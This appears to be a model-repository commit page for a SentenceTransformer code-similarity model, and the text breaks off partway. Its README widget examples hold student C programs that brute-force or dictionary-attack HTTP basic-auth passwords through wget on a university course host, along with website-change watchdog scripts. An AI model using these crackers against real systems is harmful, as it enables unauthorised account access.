Add new SentenceTransformer model
Browse files- 1_Pooling/config.json +10 -0
- README.md +752 -0
- config.json +28 -0
- config_sentence_transformers.json +14 -0
- merges.txt +0 -0
- model.safetensors +3 -0
- modules.json +14 -0
- sentence_bert_config.json +4 -0
- special_tokens_map.json +51 -0
- tokenizer.json +0 -0
- tokenizer_config.json +58 -0
- vocab.json +0 -0
1_Pooling/config.json
ADDED
@@ -0,0 +1,10 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
{
|
2 |
+
"word_embedding_dimension": 768,
|
3 |
+
"pooling_mode_cls_token": false,
|
4 |
+
"pooling_mode_mean_tokens": true,
|
5 |
+
"pooling_mode_max_tokens": false,
|
6 |
+
"pooling_mode_mean_sqrt_len_tokens": false,
|
7 |
+
"pooling_mode_weightedmean_tokens": false,
|
8 |
+
"pooling_mode_lasttoken": false,
|
9 |
+
"include_prompt": true
|
10 |
+
}
|
README.md
ADDED
@@ -0,0 +1,752 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
---
|
2 |
+
tags:
|
3 |
+
- sentence-transformers
|
4 |
+
- sentence-similarity
|
5 |
+
- feature-extraction
|
6 |
+
- dense
|
7 |
+
- generated_from_trainer
|
8 |
+
- dataset_size:3081
|
9 |
+
- loss:BatchAllTripletLoss
|
10 |
+
base_model: microsoft/unixcoder-base-unimodal
|
11 |
+
widget:
|
12 |
+
- source_sentence: "\n\n#include <stdio.h>\n#include <string.h>\n#include <sys/time.h>\n\
|
13 |
+
\n#define OneBillion 1e9\n#define false 0\n#define true 1\nint execPassword(char\
|
14 |
+
\ *, char *b) {\n\n\n char [100]={'\\0'};\n strcpy(,b);\n \n strcat(,);\n\
|
15 |
+
\ printf (\"Sending command %s\\n\",);\n if ( system()== 0) {\n printf\
|
16 |
+
\ (\"\\n password is : %s\",);\n return 1;\n }\n return 0;\n}\n \n\
|
17 |
+
\nint bruteForce(char [],char comb[],char *url) {\n\n\nint i,j,k;\n\n for(i=0;i<52\
|
18 |
+
\ ;i++) {\n comb[0]= [i];\n if (execPassword(comb,url)== 1) return\
|
19 |
+
\ 1; \n for(j=0;j<52;j++) {\n comb[1] = [j];\n \
|
20 |
+
\ if(execPassword(comb,url)==1) return 1;\n for(k=0;k<52;k++)\
|
21 |
+
\ {\n comb[2] = [k];\n if(execPassword(comb,url)==1)\
|
22 |
+
\ return 1;\n }\n comb[1] = '\\0';\n }\n }\n return\
|
23 |
+
\ 0;\n\n} \n\nint (char *argc, char *argv[]) {\n\n int i,j,k;\n char strin[80]\
|
24 |
+
\ = {'\\0'};\n char *passwd;\n char a[] = {'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'};\n\
|
25 |
+
\ char v[4]={'\\0'};\n int startTime, stopTime, final;\n int flag=false; \n strcpy(strin,\"\
|
26 |
+
wget http://sec-crack.cs.rmit.edu./SEC/2/ --http-user= --http-passwd=\");\n\n\
|
27 |
+
\ startTime = time();\n if (bruteForce(a,v,strin)==1) {\n stopTime =\
|
28 |
+
\ time();\n final = stopTime-startTime;\n }\n\n printf (\"\\n The\
|
29 |
+
\ password is : %s\",v);\n printf(\"%lld nanoseconds (%lf) seconds \\n\"\
|
30 |
+
, final, (double)final/OneBillion );\n\n}\n"
|
31 |
+
sentences:
|
32 |
+
- "\n\n\n\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <time.h>\n\n\nint\
|
33 |
+
\ ()\n\n{\n int cntr=0;\n char get[96];\n char username[]=\"\";\n char\
|
34 |
+
\ password[16];\n int R_VALUE;\n double time_used;\n clock_t , end;\n \n\
|
35 |
+
\ FILE* fp;\n fp = fopen(\"/usr/share/lib/dict/words\",\"r\");\n \n \
|
36 |
+
\ = clock();\n \n while ( fscanf(fp,\"%s\",&password) != EOF )\n\t {\n\
|
37 |
+
\ \n\t\t \n\t\t if(strlen(password)>3) continue;\n\t\t \n\t\t \
|
38 |
+
\ cntr++;\n printf(\"%d >> PASSWORD SEND : %s \\n\"\
|
39 |
+
,cntr, password);\n \n\t\t\t\tsprintf(get,\"wget --http-user=%s --http-passwd=%s\
|
40 |
+
\ http://sec-crack.cs.rmit.edu./SEC/2/\",username,password);\n \
|
41 |
+
\ \n \n R_VALUE=system(get);\n \n\t if(R_VALUE==0)\n\
|
42 |
+
\t\t\t\t{\n\t\t printf(\"The Password has been cracked and it is : %s\"\
|
43 |
+
\ , password);\n\t\t exit(0);\n\t\t\t\t}\n\n\t }\n\n\t \n end = clock();\n\
|
44 |
+
\ time_used = ((double) (end - )) / CLOCKS_PER_SEC;\n printf(\"time_used = %f\\\
|
45 |
+
n\", time_used);\n\n}\n\n\n\n"
|
46 |
+
- "\n\n\n\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <time.h>\n\n\nint\
|
47 |
+
\ ()\n\n{\n int cntr=0;\n char get[96];\n char username[]=\"\";\n char\
|
48 |
+
\ password[16];\n int R_VALUE;\n double time_used;\n clock_t , end;\n \n\
|
49 |
+
\ FILE* fp;\n fp = fopen(\"/usr/share/lib/dict/words\",\"r\");\n \n \
|
50 |
+
\ = clock();\n \n while ( fscanf(fp,\"%s\",&password) != EOF )\n\t {\n\
|
51 |
+
\ \n\t\t \n\t\t if(strlen(password)>3) continue;\n\t\t \n\t\t \
|
52 |
+
\ cntr++;\n printf(\"%d >> PASSWORD SEND : %s \\n\"\
|
53 |
+
,cntr, password);\n \n\t\t\t\tsprintf(get,\"wget --http-user=%s --http-passwd=%s\
|
54 |
+
\ http://sec-crack.cs.rmit.edu./SEC/2/\",username,password);\n \
|
55 |
+
\ \n \n R_VALUE=system(get);\n \n\t if(R_VALUE==0)\n\
|
56 |
+
\t\t\t\t{\n\t\t printf(\"The Password has been cracked and it is : %s\"\
|
57 |
+
\ , password);\n\t\t exit(0);\n\t\t\t\t}\n\n\t }\n\n\t \n end = clock();\n\
|
58 |
+
\ time_used = ((double) (end - )) / CLOCKS_PER_SEC;\n printf(\"time_used = %f\\\
|
59 |
+
n\", time_used);\n\n}\n\n\n\n"
|
60 |
+
- "\n\n#include<stdio.h>\n#include<strings.h>\n#include<stdlib.h>\n#include<ctype.h>\n\
|
61 |
+
#define MAX_SIZE 255\n\n\n\nint genchkpwd(char *chararray,char *passwd)\n {\n\
|
62 |
+
\ int i,j,k,success;\n char str1[MAX_SIZE],str2[MAX_SIZE],tempstr[MAX_SIZE];\n\
|
63 |
+
\ \n \n strcpy(str1,\"wget --http-user= --http-passwd=\");\n strcpy(str2,\"\
|
64 |
+
\ http://sec-crack.cs.rmit.edu./SEC/2/\");\n strcpy(tempstr,\"\");\n\n\n\n \
|
65 |
+
\ for(i=0;i<52;i++)\n {\n passwd[0]= chararray[i];\n strcat(tempstr,str1);\n\
|
66 |
+
\ strcat(tempstr,passwd);\n strcat(tempstr,str2);\n printf(\"SENDING\
|
67 |
+
\ REQUEST AS %s\\n\",tempstr);\n success=system (tempstr);\n if (success==0)\n\
|
68 |
+
\ return 1;\n else\n strcpy(tempstr,\"\"); \n strcpy(passwd,\"\
|
69 |
+
\");\n } \n\n\n\n for(i=0;i<52;i++)\n {\n passwd[0]= chararray[i];\n\
|
70 |
+
\ for(j=0;j<52;j++)\n {\n passwd[1]=chararray[j];\n\t strcat(tempstr,str1);\n\
|
71 |
+
\ strcat(tempstr,passwd);\n strcat(tempstr,str2);\n printf(\"\
|
72 |
+
SENDING REQUEST AS %s\\n\",tempstr);\n success=system (tempstr);\n \
|
73 |
+
\ if (success==0)\n return 1;\n else\n strcpy(tempstr,\"\
|
74 |
+
\"); \n \n } \n }\n\n\n\n for(i=0;i<52;i++)\n {\n \
|
75 |
+
\ passwd[0]= chararray[i];\n for(j=0;j<52;j++)\n {\n passwd[1]=chararray[j];\n\
|
76 |
+
\ for(k=0;k<52;k++)\n\t {\n\t passwd[2]=chararray[k];\n\t strcat(tempstr,str1);\n\
|
77 |
+
\ strcat(tempstr,passwd);\n strcat(tempstr,str2);\n \
|
78 |
+
\ printf(\"SENDING REQUEST AS %s\\n\",tempstr);\n success=system\
|
79 |
+
\ (tempstr);\n if (success==0)\n return 1;\n \
|
80 |
+
\ else\n strcpy(tempstr,\"\"); \n\t } \n } \n \
|
81 |
+
\ }\n return 1;\n } \n\nint (int argc, char *argv[])\n {\n char chararray[52],passwd[3];\n\
|
82 |
+
\ int i,success;\n char ch='a';\n\n\n \n int , end; \n \
|
83 |
+
\ = time();\t \n\n for (i=0;i<3;i++)\n {\n passwd[i]='\\0';\n\
|
84 |
+
\ } \n\n\n\n for (i=0;i<26;i++)\n {\n chararray[i]= ch;\n\
|
85 |
+
\t ch++;\n }\n ch='A'; \n for (i=26;i<52;i++)\n {\n \
|
86 |
+
\ chararray[i]= ch;\n\t ch++;\n }\n\n\n\n success=genchkpwd(chararray,passwd);\n\
|
87 |
+
\ printf(\"\\nPassword is %s\\n\",passwd); \n getpid();\n end =\
|
88 |
+
\ time(); \n printf(\"Time required = %lld msec\\n\",(end-)/());\n return\
|
89 |
+
\ (EXIT_SUCCESS);\n }\n \n\t \n\t \t\n"
|
90 |
+
- source_sentence: "#include <stdio.h>\n#include <stdlib.h>\n#include <sys/time.h>\n\
|
91 |
+
#include <strings.h>\n#include <ctype.h>\n\nint ()\n{\n FILE *fp; \n char *chk,[4];\n\
|
92 |
+
\ int i=1;\n while (i == 1) \n {\n \n system(\"wget -p --convert-links http://www.cs.rmit.edu./students/\"\
|
93 |
+
);\n\n system(\"mkdir first\"); \n system(\"mkdir second\"); \n\n \n system(\"\
|
94 |
+
mv www.cs.rmit.edu./images/*.* first/\");\n system(\"mv www.cs.rmit.edu./students/*.*\
|
95 |
+
\ first/\");\n\n sleep(86400); \n\n \n system(\"wget -p --convert-links http://www.cs.rmit.edu./students/\"\
|
96 |
+
);\n\n \n system(\"mv www.cs.rmit.edu./images/*.* second/\");\n system(\"mv\
|
97 |
+
\ www.cs.rmit.edu./students/*.* second/\");\n\n \n \n system(\"diff first second\
|
98 |
+
\ > imagesdifference.txt\");\n\n \n fp = fopen(\"imagesdifference.txt\",\"r\"\
|
99 |
+
);\n \n chk = fgets(, 4, fp);\n \n if (strlen() != 0)\n system(\"mailx\
|
100 |
+
\ -s \\\"Difference from WatchDog\\\" < imagesdifference.txt\");\n }\n return\
|
101 |
+
\ 0;\n}\n"
|
102 |
+
sentences:
|
103 |
+
- "#include<stdio.h>\n#include<stdlib.h>\n#include<string.h>\n#include<ctype.h>\n\
|
104 |
+
#include<time.h>\n\nint ()\n{\n\n int m,n,o,i;\n char URL[255];\n char v[3];\n\
|
105 |
+
\ char temp1[100];\nchar temp2[100];\nchar temp3[250];\nchar [53]={'a','A','b','B','c','C','d','D','e','E','f','F','g','G','h','H','i','I','j','J','k','K','l','L','m','M','n','N','o','O','p','P','q','Q','r','R','s','S','t','T','u','U','v','V','w','W','x','X','y','Y','z','Z'};\n\
|
106 |
+
time_t u1,u2;\n\n (void) time(&u1); \n strcpy(temp1,\"wget --http-user= --http-passwd=\"\
|
107 |
+
);\n strcpy(temp2,\" http://sec-crack.cs.rmit.edu./SEC/2/index.php\");\n \n for(m=0;m<=51;m++)\n\
|
108 |
+
\ {\n v[0]=[m]; \n v[1]='\\0';\n v[2]='\\0';\n strcpy(URL,v); \n printf(\"\
|
109 |
+
\\nTesting with password %s\\n\",URL);\n strcat(temp3,temp1);\n strcat(temp3,URL);\n\
|
110 |
+
\ strcat(temp3,temp2);\n printf(\"\\nSending the %s\\n\",temp3);\n i=system(temp3);\
|
111 |
+
\ \n \t\n\tif(i==0)\n \t{\n\t (void) time(&u2); \n\t printf(\"\\n The password\
|
112 |
+
\ is %s\\n\",URL);\n\t printf(\"\\n\\nThe time_var taken crack the password is\
|
113 |
+
\ %d second\\n\\n\",(int)(u2-u1));\n \t exit(0);\n \t} \n\telse\n\t{\n\
|
114 |
+
\tstrcpy(temp3,\"\");\n\t}\n for(n=0;n<=51;n++)\n {\n v[0]=[m]; \n v[1]=[n];\n\
|
115 |
+
\ v[2]='\\0';\n strcpy(URL,v); \n printf(\"\\nTesting with password %s\\\
|
116 |
+
n\",URL);\n strcat(temp3,temp1);\n strcat(temp3,URL);\n strcat(temp3,temp2);\n\
|
117 |
+
\ printf(\"\\nSending the %s\\n\",temp3);\n i=system(temp3);\n \t\n\tif(i==0)\n\
|
118 |
+
\ \t{\n\t (void) time(&u2); \n\t printf(\"\\n The password is %s\\n\",URL);\n\
|
119 |
+
\t printf(\"\\n\\nThe time_var taken crack the password is %d second\\n\\n\"\
|
120 |
+
,(int)(u2-u1));\n \t exit(0);\n \t} \n\telse\n\t{\n\tstrcpy(temp3,\"\");\n\
|
121 |
+
\t}\n for(o=0;o<=51;o++)\n { \n v[0]=[m]; \n v[1]=[n];\n v[2]=[o];\n\
|
122 |
+
\ strcpy(URL,v); \n printf(\"\\nTesting with password %s\\n\",URL);\n strcat(temp3,temp1);\n\
|
123 |
+
\ strcat(temp3,URL);\n strcat(temp3,temp2);\n printf(\"\\nSending the %s\\\
|
124 |
+
n\",temp3);\n i=system(temp3);\n \t\n\tif(i==0)\n \t{\n\t (void) time(&u2);\
|
125 |
+
\ \n\t printf(\"\\n The password is %s\\n\",URL);\n\t printf(\"\\n\\nThe time_var\
|
126 |
+
\ taken crack the password is %d second\\n\\n\",(int)(u2-u1));\n \t exit(0);\n\
|
127 |
+
\ \t} \n\telse\n\t{\n\tstrcpy(temp3,\"\");\n\t}\n \n \n }\n }\n } \n\
|
128 |
+
\ \n} \n"
|
129 |
+
- "\n#include <stdio.h>\n#include <stdlib.h>\n#include <ctype.h>\n#include <strings.h>\n\
|
130 |
+
#include <sys/times.h>\n#define OneBillion 1e9\n\nint () {\n FILE *fptr;\n \
|
131 |
+
\ char pass[257];\n char send[100],path[50];\n int res,count=0;\n int startTime,\
|
132 |
+
\ stopTime, final;\n startTime = time();\n while((fptr=(fopen(\"/usr/share/lib/dict/words\"\
|
133 |
+
,\"r\")))!= NULL) {\n \n while(1) {\n fgets(pass,256,fptr);\n \
|
134 |
+
\ if(pass == NULL) exit(1);\n if(pass[3]=='\\n') {\n \
|
135 |
+
\ pass[3]='\\0';\n\t send[0]='\\0';\n\t strcpy(send,\"wget --http-user=\
|
136 |
+
\ --http-passwd=\");\n \t strcat(send,pass);\n\t strcat(send,\" http://sec-crack.cs.rmit.edu./SEC/2/\"\
|
137 |
+
);\n\t count++;\n\t if((res=(system(send)) == 0)) {\n\t fclose(fptr);\n\
|
138 |
+
\t stopTime = time();\n final = stopTime-startTime;\n\t \
|
139 |
+
\ printf(\"\\n THE PASSWORD IS = %s & TIME TAKEN =%lf seconds & OF COMPARISIONs\
|
140 |
+
\ = %d\\n\",pass,(double)final/OneBillion,count);\n\t exit(1);\n\t }\n\
|
141 |
+
\ }\n }\n }\n printf(\"\\nFILE CANNOT OPENED\\n\");\n}\n"
|
142 |
+
- "#include <stdio.h>\n#include <stdlib.h>\n#include <sys/times.h>\n#include <sys/time.h>\n\
|
143 |
+
#include <strings.h>\n#include <ctype.h>\n\nint ()\n{\n int time1, time2, time_var;\n\
|
144 |
+
\ int timeinsec, nofattempts;\n char url[100], url1[80];\n strcpy(url, \"wget\
|
145 |
+
\ --http-user= --http-passwd=\");\n strcpy(url1, \" http://sec-crack.cs.rmit.edu./SEC/2/\
|
146 |
+
\ -o out.txt\");\n char word[15], *chk;\n chk = \"word\";\n FILE *fp;\n int\
|
147 |
+
\ syst = 1;\n fp = fopen(\"words\", \"r\");\n time1 = time();\n while(chk !=\
|
148 |
+
\ NULL)\n {\n chk = fgets(word, 15, fp);\n if (chk == NULL) exit(1);\n\
|
149 |
+
\ word [ strlen(word) - 1 ] = '\\0';\n strcat(url, word);\n strcat(url,\
|
150 |
+
\ url1);\n if (strlen(word) == 3)\n {\n syst = system(url);\n \
|
151 |
+
\ nofattempts = nofattempts + 1;\n printf(\"\\n %s %d\\n\",word,nofattempts);\n\
|
152 |
+
\ }\n if (syst == 0)\n {\n time2 = time();\n time_var = time2\
|
153 |
+
\ - time1;\n timeinsec = time_var/1000000000;\n printf(\"\\n The Password\
|
154 |
+
\ is: %s\",word);\n printf(\"\\n of Attempts: %d\\n\",nofattempts);\n \
|
155 |
+
\ printf(\"\\n Time Taken: %d seconds\\n\", timeinsec);\n exit(1);\n\
|
156 |
+
\ }\n strcpy(url, \"\");\n strcpy(url, \"wget --http-user= --http-passwd=\"\
|
157 |
+
);\n }\n}\n"
|
158 |
+
- source_sentence: "#include <stdio.h>\n#include <stdlib.h>\n#include <sys/times.h>\n\
|
159 |
+
#include <sys/time.h>\n#include <strings.h>\n#include <ctype.h>\n\nint ()\n{\n\
|
160 |
+
\ char url[80], url1[80];\n int i, j, k, syst = 1, nofattempts = 0;\n char\
|
161 |
+
\ c1, c2, c3, pass[4];\n int time_var,time1,time2, timeinsec;\n time1 = time();\n\
|
162 |
+
\n char itoa[52] = \"aAbBcCdDeEfFgGhHiIjJkKlLmMnNoOpPqQrRsStTuUvVwWxXyYzZ\";\n\
|
163 |
+
\n strcpy(url, \"wget --http-user= --http-passwd=\");\n strcpy(url1, \" http://sec-crack.cs.rmit.edu./SEC/2/\
|
164 |
+
\ -o out.txt\");\n\n for (i = 1; i <= 52; i++)\n {\n for (j = 1; j <= 52;\
|
165 |
+
\ j++)\n {\n for (k = 1; k <= 52; k++)\n {\n fflush(stdin);\n\
|
166 |
+
\ c1 = itoa[i];\n c2 = itoa[j];\n c3 = itoa[k];\n \
|
167 |
+
\ pass[0] = c1;\n pass[1] = c2;\n pass[2] = c3;\n \
|
168 |
+
\ \t pass[3] = '\\0';\n strcat(url, pass);\n strcat(url, url1);\n\
|
169 |
+
\t ++nofattempts;\n syst = system(url);\n printf(\"%s\\\
|
170 |
+
n\",pass);\n if (syst == 0)\n {\n time2 = time();\n\
|
171 |
+
\ time_var = time2 - time1;\n timeinsec = time_var / 1000000000;\n\
|
172 |
+
\ printf(\" Number of Attempts is %d\", nofattempts);\n \
|
173 |
+
\ printf(\"\\n Found it! The Password is: %s\\n\", pass);\n printf(\"\
|
174 |
+
\\n The time_var taken crack the password by brute force is %lld seconds\\n\"\
|
175 |
+
, timeinsec);\n exit(1);\n }\n\t strcpy(url, \"\");\n\
|
176 |
+
\ \t strcpy(url, \"wget --http-user= --http-passwd=\");\n }\n }\n\
|
177 |
+
\ }\n exit(0);\n}\n"
|
178 |
+
sentences:
|
179 |
+
- "\n\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <sys/time.h>\n#include\
|
180 |
+
\ <strings.h>\n#include <ctype.h>\n\nint ()\n{\n char word[15], *chk;\n system(\"\
|
181 |
+
wget -p --convert-links http://www.cs.rmit.edu./students/\");\n system(\"mkdir\
|
182 |
+
\ one\");\n system(\"mv www.cs.rmit.edu./images/*.* one/\");\n system(\"mv\
|
183 |
+
\ www.cs.rmit.edu./students/*.* one/\");\n sleep(15);\n system(\"wget -p --convert-links\
|
184 |
+
\ http://www.cs.rmit.edu./students/\");\n system(\"mkdir two\");\n system(\"\
|
185 |
+
mv www.cs.rmit.edu./images/*.* two/\");\n system(\"mv www.cs.rmit.edu./students/*.*\
|
186 |
+
\ two/\");\n system(\"diff one two > difference.txt\");\n system(\"mailx -s\
|
187 |
+
\ \\\"Message1\\\" < difference.txt\");\n return 0;\n}\n"
|
188 |
+
- "#include<stdio.h>\n#include<stdlib.h>\n#include<strings.h>\n#include<ctype.h>\n\
|
189 |
+
#include <sys/time.h>\n#define OneBillion 1e9\n\n\nint ()\n{ int startTime,\
|
190 |
+
\ stopTime, final;\n int i,j,k;\n int pass,count=0;\n char arr[52] ={'A','a','B','b','C','c','D','d','E','e','F','f','G','g','H','h','I','i','J','j','K','k','L','l','M','m','N','n','O','o','P','p','Q','q','R','r','S','s','T','t','U','u','V','v','W','w','X','x','Y','y','Z','z'};\n\
|
191 |
+
\ char [4];\n char url1[100];\n char url2[100];\n\n startTime = time();\n\
|
192 |
+
\ for (i=0;i<=52;i++)\n {\n\n for (j=0;j<=52;j++)\n {\n\n\tfor(k=0;k<=52;k++)\n\
|
193 |
+
\n\t { \n\t count++;\n [0] = arr[i];\n\t [1] = arr[j];\n\t\
|
194 |
+
\ [2] = arr[k];\n\t [3] = '\\0';\n\n\n\t printf(\"Checking for the\
|
195 |
+
\ word :%s\\n\",);\n\t strcpy(url1 ,\"wget --http-user= --http-passwd=\");\n\
|
196 |
+
\t strcpy(url2 , \" -nv -o output http://sec-crack.cs.rmit.edu./SEC/2/ \"\
|
197 |
+
);\n\t strcat(url1,);\n\t strcat(url1,url2);\n\n\n\t pass = system(url1);\n\
|
198 |
+
\t if (pass == 0)\n\t { \n printf(\"Success\\n\");\n\t\
|
199 |
+
\tprintf(\"Number of attempts = %d\\n\",count);\n\t stopTime = time();\n\
|
200 |
+
\n final = stopTime-startTime;\n\t\tprintf(\"The password for the\
|
201 |
+
\ user : %s\\n\",); \n printf(\" Cracked the password in %lld\
|
202 |
+
\ nanoseconds (%1f seconds) \\n\",final,(double)final/OneBillion);\n\t \
|
203 |
+
\ \n\t\texit(1);}\n\n\n\t }\n }\n\n }\n }\n\n\n"
|
204 |
+
- "#include<stdio.h>\n#include<stdlib.h>\n#include <sys/types.h>\n#include <unistd.h>\n\
|
205 |
+
#include <sys/time.h>\n\nint ()\n{\n FILE *fh,*fp,*fp1,*d;\n char\n [10000],PassString[50],p[10000],temp1[10000],filename[50],f1,f2,temp2[100];\n\
|
206 |
+
\ sleep(60*60*24);\n system(\"wget http://www.cs.rmit.edu./students\");\n if(system==0)\n\
|
207 |
+
\ {\n printf(\"File stored\");\n }\n strcpy(filename,\"index.html\"); \n\
|
208 |
+
\ if((fh=fopen(filename,\"r\"))==NULL)\n {\n printf(\"cannot open file\\n\"\
|
209 |
+
);\n exit(1);\n }\n fp=fopen(\"index.txt\",\"r\");\n fp1=fopen(\"index1.txt\"\
|
210 |
+
,\"r\");\n \n while((fgets(PassString,sizeof(PassString),fh))!= NULL)\n {\n\
|
211 |
+
\ fread(p,sizeof(PassString),sizeof(PassString),fh);\n printf(\" contents\
|
212 |
+
\ %s\\n\",p);\n while((f1!=EOF) || (f2!=EOF))\n {\n f1=getc(fp);\n \
|
213 |
+
\ f2=getc(fp1);\n if(f1<f2)\n {\n strcpy(,p);\n fp=fopen(\"\
|
214 |
+
index.txt\",\"r+b\");\n fputs(,fp);\n fflush(fp); \n fclose(fp); \n\
|
215 |
+
\ }\n else\n {\n strcpy(temp1,p);\n fp1=fopen(\"index1.txt\"\
|
216 |
+
,\"r+b\");\n fputs(temp1,fp1);\n fflush(fp1);\n fclose(fp1);\n\
|
217 |
+
\ }\n }\n if(system(\"diff -b -w index.txt index1.txt > Diff.txt\")==0)\n\
|
218 |
+
\ {\n d=fopen(\"Diff.txt\",\"r\");\n if((fgets(,sizeof(),d))!=NULL)\n\
|
219 |
+
\ {\n printf(\"The difference between exist\");\n\tsystem(\"Mail\
|
220 |
+
\ \\r\\n Difference\");\n }\n \n }\n }\n return 0;\n }\n"
|
221 |
+
- source_sentence: "\n\n \n\t \n\n\n#include<stdio.h>\n#include<stdlib.h>\n\
|
222 |
+
#include<string.h>\n\n \n int ()\n {\n char url[30];\n int\
|
223 |
+
\ exitValue=-1;\n FILE *fr;\n\n char s[300]; \t \n\tsystem(\"\
|
224 |
+
rm index.html*\");\n system(\"wget http://www.cs.rmit.edu./students/ \"\
|
225 |
+
); \n\t system(\"mv index.html one.html\");\n\t \n printf(\"System\
|
226 |
+
\ completed Writing\\n\"); \n\t system(\"sleep 3600\");\n\t \n\t \n \
|
227 |
+
\ system(\"wget http://www.cs.rmit.edu./students/ \"); \n \
|
228 |
+
